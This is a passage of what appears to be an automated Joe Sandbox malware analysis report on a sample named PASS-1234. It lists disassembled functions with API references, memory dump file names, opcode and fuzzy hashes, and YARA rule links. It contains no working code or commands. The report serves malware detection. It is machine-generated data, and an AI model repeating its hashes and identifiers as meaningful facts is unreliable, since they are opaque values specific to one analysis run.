Instruction Fuzzy Hash: 22222276A542418FCF098E7CC8917DEBBE6BB87351F14E216C531E7396C32A8909CB64

Function 6D399531 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D39952C,?,?,00000008,?,?,6D3991C4,00000000), ref: 6D39975E

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 2ab92dcf02ee7dcc2f56dcd3f471f073f2a655464aaedbba99027521da010a47
Instruction ID: bf8736f1c28523a42a9cc0a3678a5e63ca0dcd0da19048b11a8bf843782d673a
Opcode Fuzzy Hash: 2ab92dcf02ee7dcc2f56dcd3f471f073f2a655464aaedbba99027521da010a47
Instruction Fuzzy Hash: B5B16B32620609CFD705CF28C486BA57BE0FF45364F258658F9A9CF2A1D736E982CB50

Function 6D3906E8 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D3906FE

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5c401289f95ac3bd192ac44a33d31d76131f94d1755eadd9b6ce7b79dee4a13a
Instruction ID: 4064d068b7383cc8db56d88bce25242121c3f0e7a961acc539cc55172662c969
Opcode Fuzzy Hash: 5c401289f95ac3bd192ac44a33d31d76131f94d1755eadd9b6ce7b79dee4a13a
Instruction Fuzzy Hash: E0515EB2A0430A9BEB16CF56C8827AAB7F4FB48314F10852AD525EF381E3759940CF90

Function 6D393562 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2766f27c6eb219a0330456948b080a2272816139a73383700dabfa1a7b3ddd4
Instruction ID: 13c1279fa53373a0ec4d4bb6fefbc2f2366ff516b08306efeebbe0910966b4e7
Opcode Fuzzy Hash: a2766f27c6eb219a0330456948b080a2272816139a73383700dabfa1a7b3ddd4
Instruction Fuzzy Hash: 45418EB580821DAEDB10DF69CC89AAABBB9EF45304F1442EDE45D97210EA359E848F50

Function 00BCE940 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

~, xrefs: 00BCEA0B

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 5849eed77cbd9f3effddeeaa52731693b6fddd9bd2147241cc186fed283fd09b
Instruction ID: 8d92a86064b0a2644dfdd36f9b02cb98c8c0cf19dce0b7ebdb226486215ffa82
Opcode Fuzzy Hash: 5849eed77cbd9f3effddeeaa52731693b6fddd9bd2147241cc186fed283fd09b
Instruction Fuzzy Hash: 398119729042618FC7128E28889176EBBD1EB85324F19C6BDECBA9B392D634DC05D7D1

Function 00B9D7F9 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

2)g , xrefs: 00B9D8D6

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID: 2)g
API String ID: 0-1562922993
Opcode ID: a34ea2351883713a67a62e8ef963df8060f031dc369b3303355fcd0f74422e4b
Instruction ID: 4a3d210210dbf5ef0e90f3c52a62989fb5583f16f303234838316519c51b1e83
Opcode Fuzzy Hash: a34ea2351883713a67a62e8ef963df8060f031dc369b3303355fcd0f74422e4b
Instruction Fuzzy Hash: 83218C31C057538FCB15DE39C1D5587FBF0BF26300B1842A9CAA24B6A9D72054228BD3

Function 6D394A8C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6D394A8C

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: e71e963b0ad35633c3e64c627024b461ae6a6d44e6c14e02fd89b10e3b9560b2
Instruction ID: 3eae0d9478617c71ca98ebd36ed137a66b91725a7a36ad1d17621756a332bf22
Opcode Fuzzy Hash: e71e963b0ad35633c3e64c627024b461ae6a6d44e6c14e02fd89b10e3b9560b2
Instruction Fuzzy Hash: 0BA01130A02200AB8B008E328288B0C3ABCAA022C030A82BAA000CA080EB208080AA80

Function 00BB3E00 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9492b3fd694079afe65822f7100328fa0b1baa40b4dbe0688e5ef8c74d3ff70e
Instruction ID: 0005af338d591c7a55ca5873ed598db53b135781057945da5fa0bd0b1a3cabcc
Opcode Fuzzy Hash: 9492b3fd694079afe65822f7100328fa0b1baa40b4dbe0688e5ef8c74d3ff70e
Instruction Fuzzy Hash: EE52B1315083558FCB14CF19C0906FABBE1FF99314F198AADE89A57342D7B4E949CB81

Function 00BB7600 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccfc488c413313106f90fb5275672a2fed0ac348e4e61b95f74944ea1d7b1981
Instruction ID: caeb8e0bb35ef7573b77df50bc8171b821e2c891a723cb5d4f07ba38f459cc81
Opcode Fuzzy Hash: ccfc488c413313106f90fb5275672a2fed0ac348e4e61b95f74944ea1d7b1981
Instruction Fuzzy Hash: 6452B07094CB848FE735CB24C4843FBBBE1EF91314F1488ADD5E606682CBB9A985CB55

Function 00BB83F0 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e58bb79a52713d02a4e21882f4a0b4c66b9283835b0637b801eaf4d4971774
Instruction ID: d9481af19acfe02ac99bf66c88d8797532a2cf980126c2ba2c9e5b4f218bb934
Opcode Fuzzy Hash: f3e58bb79a52713d02a4e21882f4a0b4c66b9283835b0637b801eaf4d4971774
Instruction Fuzzy Hash: 9D22C132A087118BC735DF18D8806BBB3EAFFC4315F19896DD9C697285DB74A811CB86

Function 00BB4820 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d9d1927447e0a7cb520082b674f9820269535b78728de11c2a632abc32c708
Instruction ID: 1b4cb80c6ff3f578f3d488a9622468edcb662277f17d531abcc8ec9a93903004
Opcode Fuzzy Hash: 03d9d1927447e0a7cb520082b674f9820269535b78728de11c2a632abc32c708
Instruction Fuzzy Hash: E5321170915B108FC338CF29C5905AABBF1FB85710B604A6ED6A787E92D7B6F844CB14

Function 00BD0590 Relevance: .6, Instructions: 580COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84811eddf4519fc221c0ad8aa51f14681eebea8cd052d8972bb2095874e34881
Instruction ID: 1aedbb835cc292ce057d32bb83e8a2057ea3e987c054062e257def00c16f508b
Opcode Fuzzy Hash: 84811eddf4519fc221c0ad8aa51f14681eebea8cd052d8972bb2095874e34881
Instruction Fuzzy Hash: 05525EB0509B819ED326CF3C8815797BFE5AB5A324F044A9EE0FA873D2C7756005CB66

Function 00BB6860 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a6147a2b6eb16571bd941547aed8d0a3d17ba8a81220b21fb8b0f93edbe60c
Instruction ID: 3a582599d1807395f7babf11dbaf552b27726395edc5f82e285c1dc4cc0a3d97
Opcode Fuzzy Hash: 11a6147a2b6eb16571bd941547aed8d0a3d17ba8a81220b21fb8b0f93edbe60c
Instruction Fuzzy Hash: 38F1AC356087418FD724CF29C8816ABFBE6EFD8304F48886DE4D587751EAB9E804CB56

Function 00BC5150 Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14bcaf41f546fe1621ac93fb517103cf4ed7d1b91089589c2b3ba2662aeb5e7e
Instruction ID: 3864c05b37050dd4d168eabd52b6406dd05cbb13e1abfce99fa8169d34d114fa
Opcode Fuzzy Hash: 14bcaf41f546fe1621ac93fb517103cf4ed7d1b91089589c2b3ba2662aeb5e7e
Instruction Fuzzy Hash: 628123B25047148BC7249F28C892B77B3E1EF91364F1945ACE8C28B391E7B5ED45C3A6

Function 00BCEC10 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106d85f53690e5de62b95866d3afb66346140ce146c1f96cd5c3447849a1ffce
Instruction ID: cddf393345ecbca7c3a8c0f28000ac85f98afd566ce9ca03e4f61c2921c0baad
Opcode Fuzzy Hash: 106d85f53690e5de62b95866d3afb66346140ce146c1f96cd5c3447849a1ffce
Instruction Fuzzy Hash: 35B1A076914301EBE7219F24DC41F2BBBE1FB98354F144A6CF8A9A72B1D631DD188B42

Function 00BB7170 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6407c76cfec44517bd2b048b60a99ac920e3ab9c163d589af4c67c8920426b5c
Instruction ID: 8ff3266973c124ada9516ee5f854298e68ac688c795b2675d9b0776c6075ba6a
Opcode Fuzzy Hash: 6407c76cfec44517bd2b048b60a99ac920e3ab9c163d589af4c67c8920426b5c
Instruction Fuzzy Hash: A7C15BB29487418FC370CF28CC86BABB7E1FB85318F08496DD1D9C6242EB78A155CB46

Function 00BED110 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14a42c31c88e947a7e53d098ce103c92c06e45c4a7e9d7363cc0afd14f4e556a
Instruction ID: 6c3f16a24db5586c6266bce8c43dea75e3bef50599c9e392acc47c54ad9cd243
Opcode Fuzzy Hash: 14a42c31c88e947a7e53d098ce103c92c06e45c4a7e9d7363cc0afd14f4e556a
Instruction Fuzzy Hash: C8615A346083509BDB24DF1AC89167FB7E2EF96324F2486ACE8D7972A1D3B09C41C746

Function 00BCBDC0 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37904256e9b21f25fadc7d3b536694287d1f0336b770904f1f6828d71ab70111
Instruction ID: 659384115c936cb57f6333a11499454dbaf87e3cf5b144256b3eb3d9cf2729e1
Opcode Fuzzy Hash: 37904256e9b21f25fadc7d3b536694287d1f0336b770904f1f6828d71ab70111
Instruction Fuzzy Hash: 86611637B199814BD7148E3D4C52BAD6A835BE7330B3E83BEE9B58B3E5C6664C024350

Function 00BE8E10 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954e9cfa8243ac8994a67a85225e8a5d15718ee0b325fb636917656b2dda4ba6
Instruction ID: e7a0b008eb34e256b1152bf6928f20dea8f74691f0897bb1396bfed5db7223b6
Opcode Fuzzy Hash: 954e9cfa8243ac8994a67a85225e8a5d15718ee0b325fb636917656b2dda4ba6
Instruction Fuzzy Hash: 9E5159B16087948FE314DF29D49475BBBE1BB84318F044E2DE4E987391E779DA088B82

Function 00BCF330 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b6d3ee9788d6f61efa0a29f5d77d5435f41e5291fbb81436e5d924cc7c097a
Instruction ID: b44e0080d0ea3fee4145115dbef81a1275a43bd192d03cb311b7400dde0da9ea
Opcode Fuzzy Hash: 59b6d3ee9788d6f61efa0a29f5d77d5435f41e5291fbb81436e5d924cc7c097a
Instruction Fuzzy Hash: D8510426649AD14BE3298E3C6CA03BA7AD34BE7230B2DC7FDE9F5873E1D55588058350

Function 00BC5E50 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83fbe2dfe9b82f7bf99deeed87d40d9137f73e63286784943343ff0126dedb5f
Instruction ID: aecb8673fa85114e67afddb438fc32a7964d5afdf71067c7663304e45021610b
Opcode Fuzzy Hash: 83fbe2dfe9b82f7bf99deeed87d40d9137f73e63286784943343ff0126dedb5f
Instruction Fuzzy Hash: 8241D1716093018BC338DF28C891BABB3E5EF85320F154A6DE4D98B391EB74D841CB96

Function 00BE9490 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac2e0f241ba53f0888c85f0a126d3e33baf8ad59d1cc6a345b2c427172b1e71
Instruction ID: d0772f010e3cbba2d9e67d0d0a6156482261ac31cd02c7b184d250244b8b2e85
Opcode Fuzzy Hash: dac2e0f241ba53f0888c85f0a126d3e33baf8ad59d1cc6a345b2c427172b1e71
Instruction Fuzzy Hash: 983112756183118B871CDF2AC89107AF7E6EBC8311F09C67ED48A87288EB74D905C7D1

Function 00B99C68 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 551bb94f547aae600e71c9dcb248d7b786b362f3d05f7092ea807d5d699c2cbb
Instruction ID: 19048ec5212567769d2d782f011a25c7d3063564d3064e91baafdde2fddae690
Opcode Fuzzy Hash: 551bb94f547aae600e71c9dcb248d7b786b362f3d05f7092ea807d5d699c2cbb
Instruction Fuzzy Hash: 2731403D04AFC083878BAF70B3760502E903AC71382AE07D8C4908ABA39106A303D6D4

Function 00B97668 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be9f49cfc03e6050abed05098368a46fec2070f4a8bf6621ce0e810aaff524d
Instruction ID: fe6eba2b5c986987fb8e186c84d8dbb3adc33a3882fab3ca905611492ac3a7a1
Opcode Fuzzy Hash: 4be9f49cfc03e6050abed05098368a46fec2070f4a8bf6621ce0e810aaff524d
Instruction Fuzzy Hash: D2214B36C447478FDB26DE7DC8559C7BFB0E9473B074883A5C5618BBE6CB2186058B50

Function 00B985BA Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d97ad9db85ca095ba46b73e36467059e781b3f8d2921af8badd1d21d0f18b38
Instruction ID: 7a425c75da64bbb78a81ee4a624d50bcae565edb1126e65d5e803c5fd28b6a50
Opcode Fuzzy Hash: 5d97ad9db85ca095ba46b73e36467059e781b3f8d2921af8badd1d21d0f18b38
Instruction Fuzzy Hash: 4B21B73DA096964BDB22CE79D0846C1FB61AF1627835885BEC5B60F642C760D982CFE1

Function 00B99B3A Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fad0769b1de4e7df22687cdae7c011a4ca960512689f23b9e171828e1e0e527
Instruction ID: a684a3abd23df36d50df4578fbff6423843c36cffdc2bdafc1a3c816611e298e
Opcode Fuzzy Hash: 5fad0769b1de4e7df22687cdae7c011a4ca960512689f23b9e171828e1e0e527
Instruction Fuzzy Hash: 37012C3A485FC18BC35B9F74A7754853FA0BA871743AD03C8C8918ABB2C616A343D684

Function 00BB3A90 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c6286c0fd786c5696bbffd32bbe49e703b4a4a47ebca009d40f2a9d1870d21
Instruction ID: 715c964db4ad96a83d43228de9ba3d0514ce3e72d184b71ee604f1bbac5417a7
Opcode Fuzzy Hash: 48c6286c0fd786c5696bbffd32bbe49e703b4a4a47ebca009d40f2a9d1870d21
Instruction Fuzzy Hash: BDF0F62B7553160BA310DDFEECD197FB3D5EBC9618B1D4138FA81D7241E5EAE80181A0

Function 6D392E79 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction ID: a6405eaf63020978ba80bdecac0e462f2ce9b13b7906007362be7f9973ad3313
Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction Fuzzy Hash: C5E08C32D15628EBCB20CB89CA4099AB3ECEB49A00B5644A6B621E7100E270DE00C7D0

Function 6D395868 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6D3958AC

Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977B4
Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977C6
Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977D8
Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977EA
Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977FC
Part of subcall function 6D397797: _free.LIBCMT ref: 6D39780E
Part of subcall function 6D397797: _free.LIBCMT ref: 6D397820
Part of subcall function 6D397797: _free.LIBCMT ref: 6D397832
Part of subcall function 6D397797: _free.LIBCMT ref: 6D397844
Part of subcall function 6D397797: _free.LIBCMT ref: 6D397856
Part of subcall function 6D397797: _free.LIBCMT ref: 6D397868
Part of subcall function 6D397797: _free.LIBCMT ref: 6D39787A
